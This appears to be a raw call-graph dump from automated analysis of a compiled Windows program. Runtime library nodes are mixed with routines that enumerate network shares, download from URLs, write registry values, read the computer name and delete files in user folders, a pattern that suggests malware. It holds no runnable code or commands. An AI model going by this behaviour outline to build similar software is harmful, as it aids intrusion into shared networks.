e5bafd 40318->40315 40319 e5bb37 40318->40319 40324 e5bb5a 40318->40324 40417 e451d4 58 API calls __getptd_noexit 40319->40417 40321 e5bb3c 40322 e45208 __strtod_l 58 API calls 40321->40322 40323 e5bb49 40322->40323 40418 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40323->40418 40326 e5bc18 40324->40326 40333 e5bbf6 40324->40333 40419 e451d4 58 API calls __getptd_noexit 40326->40419 40327 e5ba6c 40385 e5ba95 LeaveCriticalSection __unlock_fhandle 40327->40385 40329 e5bc1d 40330 e45208 __strtod_l 58 API calls 40329->40330 40331 e5bc2a 40330->40331 40420 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40331->40420 40393 e5b1c2 40333->40393 40335 e5bcc4 40336 e5bcf1 40335->40336 40337 e5bcce 40335->40337 40411 e5b88d 40336->40411 40421 e451d4 58 API calls __getptd_noexit 40337->40421 40340 e5bcd3 40342 e45208 __strtod_l 58 API calls 40340->40342 40341 e5bd91 GetFileType 40343 e5bd9c GetLastError 40341->40343 40344 e5bdde 40341->40344 40346 e5bcdd 40342->40346 40423 e451e7 58 API calls 3 library calls 40343->40423 40424 e5b56e 59 API calls 2 library calls 40344->40424 40345 e5bd5f GetLastError 40422 e451e7 58 API calls 3 library calls 40345->40422 40347 e45208 __strtod_l 58 API calls 40346->40347 40347->40327 40351 e5bdc3 CloseHandle 40353 e5bd84 40351->40353 40354 e5bdd1 40351->40354 40352 e5b88d ___createFile 3 API calls 40355 e5bd54 40352->40355 40358 e45208 __strtod_l 58 API calls 40353->40358 40357 e45208 __strtod_l 58 API calls 40354->40357 40355->40341 40355->40345 40359 e5bdd6 40357->40359 40358->40315 40359->40353 40360 e5bdfc 40361 e5bfb7 40360->40361 40380 e5be7d 40360->40380 40425 e4f744 60 API calls 3 library calls 40360->40425 40361->40315 40363 e5c18a CloseHandle 40361->40363 40364 e5b88d ___createFile 3 API calls 40363->40364 40365 e5be66 40365->40380 40426 e451d4 58 API calls __getptd_noexit 40365->40426 40373 e4b5c4 70 API calls __read_nolock 40373->40380 40374 e5be85 40374->40380 40427 e50b25 61 API calls 3 library calls 40374->40427 40428 e67cac 82 API calls 5 library calls 40374->40428 40377 e4df14 __write 78 API calls 40377->40380 40378 e5c034 40429 e50b25 61 API calls 3 library calls 40378->40429 40380->40361 40380->40373 40380->40374 40380->40377 40380->40378 40383 e4f744 60 API calls __lseeki64_nolock 40380->40383 40383->40380 40384->40311 40385->40311 40387 e67f6f 40386->40387 40388 e67f5a 40386->40388 40387->40318 40389 e45208 __strtod_l 58 API calls 40388->40389 40390 e67f5f 40389->40390 40433 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40390->40433 40392 e67f6a 40392->40318 40394 e5b1ce __setmbcp 40393->40394 40395 e48b9f __mtinitlocknum 58 API calls 40394->40395 40396 e5b1df 40395->40396 40397 e48af7 __lock 58 API calls 40396->40397 40398 e5b1e4 __setmbcp 40396->40398 40408 e5b1f2 40397->40408 40398->40335 40399 e5b340 40436 e5b362 LeaveCriticalSection _doexit 40399->40436 40401 e5b2d2 40402 e48c96 __calloc_crt 58 API calls 40401->40402 40405 e5b2db 40402->40405 40403 e5b272 EnterCriticalSection 40406 e5b282 LeaveCriticalSection 40403->40406 40403->40408 40404 e48af7 __lock 58 API calls 40404->40408 40405->40399 40407 e5b134 ___lock_fhandle 59 API calls 40405->40407 40406->40408 40407->40399 40408->40399 40408->40401 40408->40403 40408->40404 40434 e5263e InitializeCriticalSectionAndSpinCount 40408->40434 40435 e5b29a LeaveCriticalSection _doexit 40408->40435 40412 e5b898 ___crtIsPackagedApp 40411->40412 40413 e5b8f3 CreateFileW 40412->40413 40414 e5b89c GetModuleHandleW GetProcAddress 40412->40414 40416 e5b911 40413->40416 40415 e5b8b9 40414->40415 40415->40416 40416->40341 40416->40345 40416->40352 40417->40321 40418->40327 40419->40329 40420->40315 40421->40340 40422->40353 40423->40351 40424->40360 40425->40365 40426->40380 40427->40374 40428->40374 40432->40317 40433->40392 40434->40408 40435->40408 40436->40398 40437->40207 40439 e40e85 EnterCriticalSection 40438->40439 40440 e40e63 40438->40440 40442 e40e7b 40439->40442 40440->40439 40441 e40e6b 40440->40441 40443 e48af7 __lock 58 API calls 40441->40443 40442->40220 40443->40442 40445 e494a3 40444->40445 40446 e4932b 40444->40446 40482 e4938a 40445->40482 40508 e5c784 72 API calls 4 library calls 40445->40508 40447 e4816b __filbuf 58 API calls 40446->40447 40448 e49331 40447->40448 40450 e4816b __filbuf 58 API calls 40448->40450 40465 e49354 40448->40465 40451 e4933d 40450->40451 40455 e4816b __filbuf 58 API calls 40451->40455 40451->40465 40452 e493c0 40452->40445 40456 e4816b __filbuf 58 API calls 40452->40456 40453 e4936d 40454 e4b2f2 __filbuf 72 API calls 40453->40454 40460 e49372 40453->40460 40454->40460 40457 e49349 40455->40457 40458 e493d0 40456->40458 40461 e4816b __filbuf 58 API calls 40457->40461 40459 e493f3 40458->40459 40462 e4816b __filbuf 58 API calls 40458->40462 40459->40445 40464 e4940e 40459->40464 40463 e4b2f2 __filbuf 72 API calls 40460->40463 40460->40482 40461->40465 40466 e493dc 40462->40466 40463->40482 40467 e49416 40464->40467 40485 e4b2f2 40464->40485 40465->40452 40465->40453 40466->40459 40469 e4816b __filbuf 58 API calls 40466->40469 40467->40482 40505 e42d33 58 API calls __isleadbyte_l 40467->40505 40471 e493e8 40469->40471 40473 e4816b __filbuf 58 API calls 40471->40473 40472 e4943e 40474 e49473 40472->40474 40475 e49448 40472->40475 40477 e4b2f2 __filbuf 72 API calls 40472->40477 40473->40459 40507 e5c76c 60 API calls __woutput_l 40474->40507 40475->40474 40479 e49460 40475->40479 40477->40475 40478 e49487 40480 e45208 __strtod_l 58 API calls 40478->40480 40478->40482 40506 e5c607 60 API calls 5 library calls 40479->40506 40480->40482 40482->40220 40483->40216 40484->40216 40486 e4b2fd 40485->40486 40490 e4b312 40485->40490 40487 e45208 __strtod_l 58 API calls 40486->40487 40488 e4b302 40487->40488 40542 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40488->40542 40491 e4b347 40490->40491 40498 e4b30d 40490->40498 40543 e58a16 58 API calls __malloc_crt 40490->40543 40493 e4816b __filbuf 58 API calls 40491->40493 40494 e4b35b 40493->40494 40509 e4b4b0 40494->40509 40496 e4b362 40497 e4816b __filbuf 58 API calls 40496->40497 40496->40498 40499 e4b385 40497->40499 40498->40467 40499->40498 40500 e4816b __filbuf 58 API calls 40499->40500 40501 e4b391 40500->40501 40501->40498 40502 e4816b __filbuf 58 API calls 40501->40502 40503 e4b39e 40502->40503 40504 e4816b __filbuf 58 API calls 40503->40504 40504->40498 40505->40472 40506->40482 40507->40478 40508->40482 40510 e4b4bc __setmbcp 40509->40510 40511 e4b4e0 40510->40511 40512 e4b4c9 40510->40512 40514 e4b5a4 40511->40514 40517 e4b4f4 40511->40517 40612 e451d4 58 API calls __getptd_noexit 40512->40612 40617 e451d4 58 API calls __getptd_noexit 40514->40617 40516 e4b4ce 40518 e45208 __strtod_l 58 API calls 40516->40518 40519 e4b512 40517->40519 40520 e4b51f 40517->40520 40533 e4b4d5 __setmbcp 40518->40533 40613 e451d4 58 API calls __getptd_noexit 40519->40613 40523 e4b541 40520->40523 40524 e4b52c 40520->40524 40521 e4b517 40526 e45208 __strtod_l 58 API calls 40521->40526 40525 e5b134 ___lock_fhandle 59 API calls 40523->40525 40614 e451d4 58 API calls __getptd_noexit 40524->40614 40528 e4b547 40525->40528 40529 e4b539 40526->40529 40531 e4b56d 40528->40531 40532 e4b55a 40528->40532 40618 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40529->40618 40530 e4b531 40534 e45208 __strtod_l 58 API calls 40530->40534 40537 e45208 __strtod_l 58 API calls 40531->40537 40544 e4b5c4 40532->40544 40533->40496 40534->40529 40539 e4b572 40537->40539 40538 e4b566 40616 e4b59c LeaveCriticalSection __unlock_fhandle 40538->40616 40615 e451d4 58 API calls __getptd_noexit 40539->40615 40542->40498 40543->40491 40545 e4b5e5 40544->40545 40546 e4b5fc 40544->40546 40619 e451d4 58 API calls __getptd_noexit 40545->40619 40548 e4bd34 40546->40548 40552 e4b636 40546->40552 40629 e451d4 58 API calls __getptd_noexit 40548->40629 40549 e4b5ea 40551 e45208 __strtod_l 58 API calls 40549->40551 40595 e4b5f1 40551->40595 40554 e4b63e 40552->40554 40560 e4b655 40552->40560 40553 e4bd39 40555 e45208 __strtod_l 58 API calls 40553->40555 40620 e451d4 58 API calls __getptd_noexit 40554->40620 40558 e4b643 40561 e4b66a 40560->40561 40563 e4b684 40560->40563 40565 e4b6a2 40560->40565 40560->40595 40621 e451d4 58 API calls __getptd_noexit 40561->40621 40563->40561 40569 e4b68f 40563->40569 40566 e48cde __malloc_crt 58 API calls 40565->40566 40595->40538 40612->40516 40613->40521 40614->40530 40615->40538 40616->40533 40617->40521 40618->40533 40619->40549 40620->40558 40621->40558 40629->40553 40632 e439ef 40631->40632 40633 e439db 40631->40633 40635 e439eb 40632->40635 40637 e4836b __flush 78 API calls 40632->40637 40634 e45208 __strtod_l 58 API calls 40633->40634 40636 e439e0 40634->40636 40648 e43aa7 LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 40635->40648 40649 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40636->40649 40639 e439fb 40637->40639 40650 e50bbf 58 API calls _free 40639->40650 40641 e43a03 40642 e4816b __filbuf 58 API calls 40641->40642 40643 e43a09 40642->40643 40651 e50a4a 63 API calls 6 library calls 40643->40651 40645 e43a0f 40645->40635 40646 e40bed _free 58 API calls 40645->40646 40646->40635 40647->40230 40648->40230 40649->40635 40650->40641 40651->40645 40653 e35ab8 40652->40653 40654 e359e8 40652->40654 40731 e6f26c 59 API calls 3 library calls 40653->40731 40656 e35ac2 40654->40656 40657 e35a02 40654->40657 40732 e6f23e 59 API calls 2 library calls 40656->40732 40659 e35a1a 40657->40659 40660 e35acc 40657->40660 40661 e35a2a ___check_float_string 40657->40661 40659->40661 40663 e36950 59 API calls 40659->40663 40733 e6f23e 59 API calls 2 library calls 40660->40733 40661->39585 40663->40661 40731->40656 40824 e3c001 40823->40824 40833 e3c00a 40823->40833 40825 e3c083 40824->40825 40826 e3c04c 40824->40826 40824->40833 40828 e3c09e 40825->40828 40831 e3c0e1 40825->40831 40827 e3cf30 59 API calls 40826->40827 40827->40833 40835 e3cf30 40828->40835 40843 e3c540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 40831->40843 40832 e3c0b2 40832->40833 40839 e3d5b0 40832->40839 40833->39698 40836 e3cf41 40835->40836 40837 e3cf5b 40835->40837 40836->40837 40838 e34690 59 API calls 40836->40838 40837->40832 40838->40836 40840 e3d5e2 40839->40840 40841 e3d63e 40840->40841 40842 e34690 59 API calls 40840->40842 40841->40833 40842->40840 40843->40832 40887 e43f74 40844->40887 40847 e3f196 Sleep 40848 e3f1c1 40847->40848 40849 e3f94b 40847->40849 40850 e30a50 65 API calls 40848->40850 40851 e34690 59 API calls 40849->40851 40856 e3f1cd 40850->40856 40852 e3f97a 40851->40852 40948 e30160 89 API calls 5 library calls 40852->40948 40854 e35c10 59 API calls 40855 e3f274 40854->40855 40890 e2f730 40855->40890 40859 e40235 ___get_qualified_locale 60 API calls 40856->40859 40863 e3f216 40856->40863 40858 e3f9c1 SendMessageW 40860 e3f9e1 40858->40860 40882 e3f8af 40858->40882 40859->40856 40860->40882 40861 e311c0 170 API calls 40862 e3f987 40861->40862 40862->40858 40862->40861 40864 e31ab0 PeekMessageW DispatchMessageW PeekMessageW 40862->40864 40863->40854 40864->40862 40865 e3f392 40867 e35c10 59 API calls 40865->40867 40872 e2f730 192 API calls 40865->40872 40875 e3f52c 40865->40875 40866 e35c10 59 API calls 40868 e3f281 40866->40868 40867->40865 40868->40865 40868->40866 40871 e2f730 192 API calls 40868->40871 40869 e3f5bd PeekMessageW 40869->40875 40870 e35c10 59 API calls 40871->40868 40872->40865 40873 e3f689 40873->40870 40874 e34690 59 API calls 40874->40875 40875->40869 40875->40873 40875->40874 40877 e2f730 192 API calls 40875->40877 40879 e3f5d6 DispatchMessageW PeekMessageW 40875->40879 40877->40875 40879->40875 40888 e45007 _TestDefaultLanguage 58 API calls 40887->40888 40889 e3f16a Sleep 40888->40889 40889->40847 40889->40882 40891 e31ab0 3 API calls 40890->40891 40900 e2f765 40891->40900 40892 e2f8b5 40893 e34690 59 API calls 40892->40893 40894 e2f8ea PathFindFileNameW 40893->40894 40896 e2f923 40894->40896 40895 e34690 59 API calls 40895->40900 40896->40896 40897 e35c10 59 API calls 40896->40897 40898 e2f98c 40897->40898 40900->40892 40900->40895 40901 e35ae0 59 API calls 40900->40901 40902 e40235 ___get_qualified_locale 60 API calls 40900->40902 40917 e2f927 40900->40917 40901->40900 40902->40900 40917->40868 40948->40862 41047 e30bd0 WNetOpenEnumW 41044->41047 41046 e3fd95 SendMessageW 41048 e30c33 GlobalAlloc 41047->41048 41049 e30c1c 41047->41049 41053 e30c45 _memset 41048->41053 41049->41046 41050 e30c51 WNetEnumResourceW 41051 e30ea3 WNetCloseEnum 41050->41051 41050->41053 41051->41046 41052 e35c10 59 API calls 41052->41053 41053->41050 41053->41052 41053->41053 41054 e350c0 59 API calls 41053->41054 41055 e30bd0 59 API calls 41053->41055 41056 e38fd0 59 API calls 41053->41056 41054->41053 41055->41053 41056->41053 41057->39740 41058->39728 41059->39730 41062 e4f7c0 __ftell_nolock 41061->41062 41063 e3e6b6 timeGetTime 41062->41063 41064 e43f74 58 API calls 41063->41064 41065 e3e6cc 41064->41065 41131 e2c6a0 RegOpenKeyExW 41065->41131 41068 e3e72e InternetOpenW 41089 e3e6d4 _memset _strstr _wcsstr 41068->41089 41069 e3ea8d lstrlenA lstrcpyA lstrcpyA lstrlenA 41069->41089 41070 e3ea4c SHGetFolderPathA 41072 e3ea67 PathAppendA DeleteFileA 41070->41072 41070->41089 41072->41089 41073 e3eada lstrlenA 41073->41089 41074 e356d0 59 API calls 41074->41089 41075 e34690 59 API calls 41088 e3e7be _memmove 41075->41088 41076 e3ee4d 41078 e2ef50 58 API calls 41076->41078 41077 e35ae0 59 API calls 41077->41089 41083 e3ee5d 41078->41083 41079 e33ff0 59 API calls 41079->41089 41080 e32900 60 API calls 41080->41089 41082 e3eb53 lstrcpyW 41084 e3eb74 lstrlenA 41082->41084 41082->41089 41086 e33ea0 59 API calls 41083->41086 41091 e3eeb1 41083->41091 41087 e40c62 _malloc 58 API calls 41084->41087 41085 e359d0 59 API calls 41085->41089 41086->41083 41087->41089 41088->41075 41088->41089 41178 e2dd40 73 API calls 4 library calls 41088->41178 41089->41068 41089->41069 41089->41070 41089->41073 41089->41074 41089->41076 41089->41077 41089->41079 41089->41080 41089->41082 41089->41084 41089->41085 41089->41088 41090 e3e8f3 lstrcpyW 41089->41090 41092 e3e943 InternetOpenUrlW InternetReadFile 41089->41092 41094 e3eb99 MultiByteToWideChar lstrcpyW 41089->41094 41095 e3e9ec InternetCloseHandle InternetCloseHandle 41089->41095 41098 e3ec3d lstrlenW lstrlenA lstrcpyA lstrcpyA lstrlenA 41089->41098 41100 e3e93c lstrcatW 41089->41100 41101 e3ebf0 SHGetFolderPathA 41089->41101 41105 e3e9c4 lstrlenA 41089->41105 41107 e3ecaa lstrlenA 41089->41107 41110 e43a38 __fcloseall 83 API calls 41089->41110 41113 e3ed1f lstrcpyW 41089->41113 41115 e3ed43 lstrlenA 41089->41115 41122 e3ed68 MultiByteToWideChar lstrcpyW lstrlenW 41089->41122 41126 e3edc3 SHGetFolderPathA 41089->41126 41128 e40bed 58 API calls _free 41089->41128 41136 e2c500 SHGetFolderPathA 41089->41136 41172 e31b10 timeGetTime timeGetTime 41089->41172 41090->41089 41090->41092 41093 e2ef50 58 API calls 41091->41093 41092->41095 41096 e3e97c SHGetFolderPathA 41092->41096 41102 e3eec1 41093->41102 41094->41089 41095->41089 41096->41095 41097 e3e996 PathAppendA 41096->41097 41156 e420b6 41097->41156 41098->41089 41100->41092 41101->41089 41103 e3ec17 PathAppendA DeleteFileA 41101->41103 41104 e33ea0 59 API calls 41102->41104 41108 e3ef12 41102->41108 41103->41089 41104->41102 41159 e42b02 41105->41159 41107->41089 41109 e33ff0 59 API calls 41108->41109 41111 e3ef3a 41109->41111 41110->41089 41112 e32900 60 API calls 41111->41112 41114 e3ef45 lstrcpyW 41112->41114 41113->41089 41113->41115 41118 e3ef6a 41114->41118 41117 e40c62 _malloc 58 API calls 41115->41117 41117->41089 41119 e33ff0 59 API calls 41118->41119 41120 e3ef9f 41119->41120 41121 e32900 60 API calls 41120->41121 41123 e3efac lstrcpyW 41121->41123 41122->41089 41124 e3edad lstrlenW 41122->41124 41129 e3ee44 41123->41129 41124->41089 41124->41129 41126->41089 41127 e3edea PathAppendA DeleteFileA 41126->41127 41127->41089 41128->41089 41132 e2c734 41131->41132 41133 e2c6cc RegQueryValueExW 41131->41133 41132->41089 41134 e2c70c RegSetValueExW RegCloseKey 41133->41134 41135 e2c6fd RegCloseKey 41133->41135 41134->41132 41135->41089 41137 e2c525 41136->41137 41138 e2c52c PathAppendA 41136->41138 41137->41089 41139 e420b6 125 API calls 41138->41139 41140 e2c550 41139->41140 41141 e2c559 41140->41141 41179 e4387f 41140->41179 41141->41089 41143 e2c56c 41192 e43455 41143->41192 41145 e2c572 41205 e40cf4 41145->41205 41147 e2c57a 41148 e2c5a5 41147->41148 41150 e2c589 41147->41150 41149 e43a38 __fcloseall 83 API calls 41148->41149 41151 e2c5ab 41149->41151 41222 e422f5 41150->41222 41151->41089 41154 e43a38 __fcloseall 83 API calls 41155 e2c599 41154->41155 41155->41089 41369 e41ff2 41156->41369 41158 e420c6 41158->41089 41160 e42b0e __setmbcp 41159->41160 41161 e42b44 41160->41161 41162 e42b2c 41160->41162 41163 e42b3c __setmbcp 41160->41163 41164 e40e53 __lock_file 59 API calls 41161->41164 41165 e45208 __strtod_l 58 API calls 41162->41165 41163->41089 41166 e42b4a 41164->41166 41167 e42b31 41165->41167 41460 e429a9 78 API calls 6 library calls 41166->41460 41459 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 41167->41459 41170 e42b5e 41461 e42b7c LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 41170->41461 41173 e31b7f 41172->41173 41174 e31b2f 41172->41174 41173->41089 41174->41173 41175 e31b40 PeekMessageW 41174->41175 41177 e31b58 DispatchMessageW PeekMessageW 41174->41177 41175->41174 41176 e31b70 Sleep timeGetTime 41175->41176 41176->41173 41176->41175 41177->41174 41177->41176 41178->41088 41182 e4388b __setmbcp 41179->41182 41180 e4389d 41183 e45208 __strtod_l 58 API calls 41180->41183 41181 e438c3 41184 e40e53 __lock_file 59 API calls 41181->41184 41182->41180 41182->41181 41185 e438a2 41183->41185 41186 e438c9 41184->41186 41237 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 41185->41237 41225 e437f0 41186->41225 41191 e438ad __setmbcp 41191->41143 41193 e43461 __setmbcp 41192->41193 41194 e43473 41193->41194 41195 e43488 41193->41195 41196 e45208 __strtod_l 58 API calls 41194->41196 41197 e40e53 __lock_file 59 API calls 41195->41197 41198 e43478 41196->41198 41199 e4348e 41197->41199 41334 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 41198->41334 41201 e430c5 __ftell_nolock 67 API calls 41199->41201 41202 e43499 41201->41202 41335 e434b9 LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 41202->41335 41204 e43483 __setmbcp 41204->41145 41206 e40d00 __setmbcp 41205->41206 41207 e40d24 41206->41207 41208 e40d0e 41206->41208 41210 e4816b __filbuf 58 API calls 41207->41210 41209 e45208 __strtod_l 58 API calls 41208->41209 41211 e40d13 41209->41211 41212 e40d2d 41210->41212 41336 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 41211->41336 41214 e40e53 __lock_file 59 API calls 41212->41214 41216 e40d35 41214->41216 41215 e40d1e __setmbcp 41215->41147 41217 e4836b __flush 78 API calls 41216->41217 41218 e40d41 41217->41218 41219 e4818f __write 64 API calls 41218->41219 41220 e40d8b 41219->41220 41337 e40dab LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 41220->41337 41338 e42310 41222->41338 41224 e2c593 41224->41154 41226 e4380e 41225->41226 41227 e437fe 41225->41227 41232 e43824 41226->41232 41267 e430c5 41226->41267 41228 e45208 __strtod_l 58 API calls 41227->41228 41231 e43803 41228->41231 41230 e4836b __flush 78 API calls 41233 e43837 41230->41233 41238 e438fa LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 41231->41238 41232->41230 41234 e4816b __filbuf 58 API calls 41233->41234 41235 e43865 41234->41235 41239 e4818f 41235->41239 41237->41191 41238->41191 41240 e4819b __setmbcp 41239->41240 41241 e481bf 41240->41241 41242 e481a8 41240->41242 41244 e4825e 41241->41244 41246 e481d3 41241->41246 41309 e451d4 58 API calls __getptd_noexit 41242->41309 41313 e451d4 58 API calls __getptd_noexit 41244->41313 41245 e481ad 41249 e45208 __strtod_l 58 API calls 41245->41249 41250 e481f1 41246->41250 41251 e481fb 41246->41251 41248 e481f6 41254 e45208 __strtod_l 58 API calls 41248->41254 41262 e481b4 __setmbcp 41249->41262 41310 e451d4 58 API calls __getptd_noexit 41250->41310 41252 e5b134 ___lock_fhandle 59 API calls 41251->41252 41255 e48201 41252->41255 41256 e4826a 41254->41256 41257 e48214 41255->41257 41258 e48227 41255->41258 41314 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 41256->41314 41296 e4827e 41257->41296 41261 e45208 __strtod_l 58 API calls 41258->41261 41264 e4822c 41261->41264 41262->41231 41263 e48220 41312 e48256 LeaveCriticalSection __unlock_fhandle 41263->41312 41311 e451d4 58 API calls __getptd_noexit 41264->41311 41268 e430d2 __ftell_nolock 41267->41268 41269 e43102 41268->41269 41270 e430ea 41268->41270 41271 e4816b __filbuf 58 API calls 41269->41271 41272 e45208 __strtod_l 58 API calls 41270->41272 41274 e4310a 41271->41274 41273 e430ef 41272->41273 41332 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 41273->41332 41276 e4818f __write 64 API calls 41274->41276 41277 e43126 41276->41277 41280 e43316 41277->41280 41281 e431a9 41277->41281 41294 e430fa 41277->41294 41278 e4a77e __strtod_l 6 API calls 41279 e43451 41278->41279 41279->41232 41282 e4331f 41280->41282 41286 e432d2 41280->41286 41284 e431cf 41281->41284 41281->41286 41283 e45208 __strtod_l 58 API calls 41282->41283 41283->41294 41284->41294 41333 e4f648 62 API calls 6 library calls 41284->41333 41288 e4818f __write 64 API calls 41286->41288 41286->41294 41287 e43208 41289 e43234 ReadFile 41287->41289 41287->41294 41290 e43383 41288->41290 41291 e43259 41289->41291 41289->41294 41293 e4818f __write 64 API calls 41290->41293 41290->41294 41292 e4818f __write 64 API calls 41291->41292 41295 e4326c 41292->41295 41293->41294 41294->41278 41295->41294 41315 e5b3f1 41296->41315 41298 e4828f 41299 e482a6 SetFilePointerEx 41298->41299 41300 e48297 41298->41300 41302 e482d2 GetLastError 41299->41302 41303 e482be SetFilePointerEx 41299->41303 41301 e45208 __strtod_l 58 API calls 41300->41301 41306 e4829c 41301->41306 41328 e451e7 58 API calls 3 library calls 41302->41328 41303->41302 41304 e482e1 41303->41304 41304->41306 41307 e482e7 SetFilePointerEx 41304->41307 41306->41263 41308 e45208 __strtod_l 58 API calls 41307->41308 41308->41306 41309->41245 41310->41248 41311->41263 41312->41262 41313->41248 41314->41262 41316 e5b411 41315->41316 41317 e5b3fc 41315->41317 41322 e5b436 41316->41322 41330 e451d4 58 API calls __getptd_noexit 41316->41330 41329 e451d4 58 API calls __getptd_noexit 41317->41329 41320 e5b401 41321 e45208 __strtod_l 58 API calls 41320->41321 41324 e5b409 41321->41324 41322->41298 41323 e5b440 41325 e45208 __strtod_l 58 API calls 41323->41325 41324->41298 41326 e5b448 41325->41326 41331 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 41326->41331 41328->41306 41329->41320 41330->41323 41331->41324 41332->41294 41333->41287 41334->41204 41335->41204 41336->41215 41337->41215 41339 e4231c __setmbcp 41338->41339 41340 e42332 _memset 41339->41340 41341 e4235f 41339->41341 41342 e42357 __setmbcp 41339->41342 41344 e45208 __strtod_l 58 API calls 41340->41344 41343 e40e53 __lock_file 59 API calls 41341->41343 41342->41224 41345 e42365 41343->41345 41346 e4234c 41344->41346 41351 e42130 41345->41351 41365 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 41346->41365 41355 e4214b _memset 41351->41355 41357 e42166 41351->41357 41352 e42156 41353 e45208 __strtod_l 58 API calls 41352->41353 41354 e4215b 41353->41354 41367 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 41354->41367 41355->41352 41355->41357 41362 e421a6 41355->41362 41366 e42399 LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 41357->41366 41358 e4b2f2 __filbuf 72 API calls 41358->41362 41359 e422b7 _memset 41363 e45208 __strtod_l 58 API calls 41359->41363 41360 e4816b __filbuf 58 API calls 41360->41362 41362->41357 41362->41358 41362->41359 41362->41360 41364 e4b5c4 __read_nolock 70 API calls 41362->41364 41368 e49544 58 API calls 3 library calls 41362->41368 41363->41354 41364->41362 41365->41342 41366->41342 41367->41357 41368->41362 41371 e41ffe __setmbcp 41369->41371 41370 e42010 41372 e45208 __strtod_l 58 API calls 41370->41372 41371->41370 41373 e4203d 41371->41373 41374 e42015 41372->41374 41375 e48df4 __getstream 61 API calls 41373->41375 41405 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 41374->41405 41377 e42042 41375->41377 41378 e42058 41377->41378 41379 e4204b 41377->41379 41381 e42081 41378->41381 41382 e42061 41378->41382 41380 e45208 __strtod_l 58 API calls 41379->41380 41383 e42020 @_EH4_CallFilterFunc@8 __setmbcp 41380->41383 41388 e4b078 41381->41388 41384 e45208 __strtod_l 58 API calls 41382->41384 41383->41158 41384->41383 41397 e4b095 41388->41397 41389 e4b0a9 41390 e45208 __strtod_l 58 API calls 41389->41390 41392 e4b0ae 41390->41392 41391 e4b250 41391->41389 41394 e4b2ac 41391->41394 41410 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 41392->41410 41407 e5fba6 41394->41407 41395 e4208c 41406 e420ae LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 41395->41406 41397->41389 41397->41391 41411 e5fbc4 58 API calls __mbsnbcmp_l 41397->41411 41399 e4b216 41399->41389 41412 e5fcf3 65 API calls __mbsnbicmp_l 41399->41412 41401 e4b249 41401->41391 41413 e5fcf3 65 API calls __mbsnbicmp_l 41401->41413 41403 e4b268 41403->41391 41414 e5fcf3 65 API calls __mbsnbicmp_l 41403->41414 41405->41383 41406->41383 41415 e5fa8f 41407->41415 41409 e5fbbf 41409->41395 41410->41395 41411->41399 41412->41401 41413->41403 41414->41391 41418 e5fa9b __setmbcp 41415->41418 41416 e5fab1 41417 e45208 __strtod_l 58 API calls 41416->41417 41419 e5fab6 41417->41419 41418->41416 41420 e5fae7 41418->41420 41433 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 41419->41433 41426 e5fb58 41420->41426 41425 e5fac0 __setmbcp 41425->41409 41435 e47970 41426->41435 41429 e5fb03 41434 e5fb2c LeaveCriticalSection __unlock_fhandle 41429->41434 41430 e5bac1 __wsopen_nolock 109 API calls 41431 e5fb92 41430->41431 41432 e40bed _free 58 API calls 41431->41432 41432->41429 41433->41425 41434->41425 41436 e47993 41435->41436 41437 e4797d 41435->41437 41436->41437 41439 e4799a ___crtIsPackagedApp 41436->41439 41438 e45208 __strtod_l 58 API calls 41437->41438 41440 e47982 41438->41440 41442 e479b0 MultiByteToWideChar 41439->41442 41443 e479a3 AreFileApisANSI 41439->41443 41456 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 41440->41456 41445 e479ca GetLastError 41442->41445 41446 e479db 41442->41446 41443->41442 41444 e479ad 41443->41444 41444->41442 41457 e451e7 58 API calls 3 library calls 41445->41457 41447 e48cde __malloc_crt 58 API calls 41446->41447 41449 e479e3 41447->41449 41450 e479ea MultiByteToWideChar 41449->41450 41455 e4798c 41449->41455 41451 e47a00 GetLastError 41450->41451 41450->41455 41458 e451e7 58 API calls 3 library calls 41451->41458 41453 e47a0c 41454 e40bed _free 58 API calls 41453->41454 41454->41455 41455->41429 41455->41430 41456->41455 41457->41455 41458->41453 41459->41163 41460->41170 41461->41163 41462 e2a290 41463 e3cc50 59 API calls 41462->41463 41464 e2a299 41463->41464 41465 e419ac __cinit 67 API calls 41464->41465 41466 e2a2a8 41465->41466 41467 e3bae0 41468 e3bb13 41467->41468 41469 e3bba0 41467->41469 41472 e3bb15 41468->41472 41473 e3bb54 41468->41473 41470 e3bf3d 41469->41470 41471 e3bbad 41469->41471 41479 e3bf65 IsWindow 41470->41479 41480 e3bf9a DefWindowProcW 41470->41480 41475 e3bbb0 DefWindowProcW 41471->41475 41476 e3bbd7 41471->41476 41477 e3bb47 PostQuitMessage 41472->41477 41478 e3bb1c 41472->41478 41474 e3bb70 41473->41474 41481 e3bb75 DefWindowProcW 41473->41481 41482 e40c62 _malloc 58 API calls 41476->41482 41477->41474 41478->41474 41478->41475 41484 e3bb2e 41478->41484 41479->41474 41485 e3bf73 DestroyWindow 41479->41485 41483 e3bbe9 GetComputerNameW 41482->41483 41486 e33100 59 API calls 41483->41486 41484->41474 41488 e31cd0 92 API calls 41484->41488 41485->41474 41487 e3bc26 41486->41487 41506 e3ce80 59 API calls _memmove 41487->41506 41490 e3bb3f 41488->41490 41490->41479 41491 e3bc3a 41492 e40bed _free 58 API calls 41491->41492 41504 e3bcdc 41492->41504 41493 e3befb IsWindow 41494 e3bf11 